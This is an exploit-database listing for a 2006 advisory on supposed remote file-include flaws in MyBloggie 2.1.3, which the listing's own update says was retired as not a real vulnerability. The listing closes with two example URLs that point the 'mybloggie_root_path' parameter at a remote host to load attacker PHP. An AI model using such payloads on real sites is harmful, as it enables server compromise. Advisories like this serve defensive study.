header-logo
Suggest Exploit
vendor:
MyBloggie
by:
SecurityFocus
2.6
CVSS
LOW
Remote File-Include Vulnerabilities
94
CWE
Product Name: MyBloggie
Affected Version From: MyBloggie 2.1.3 and earlier
Affected Version To: MyBloggie 2.1.3 and earlier
Patch Exists: NO
Related CWE: N/A
CPE: mybloggie
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

MyBloggie Multiple Remote File-Include Vulnerabilities

MyBloggie is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19449/info

MyBloggie is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

MyBloggie 2.1.3 and earlier are vulnerable to this issue; other versions may also be affected.

Update: Reports indicate that this is not a vulnerability because 'mybloggie_root_path' is defined as './' prior to its use in the vulnerable scripts. Therefore this BID is retired.

http://www.example.com/[myBloggie]/index.php?mybloggie_root_path=http://www.example.com http://www.example.com/[myBloggie]/includes/db.php? mybloggie_root_path=http://www.example.com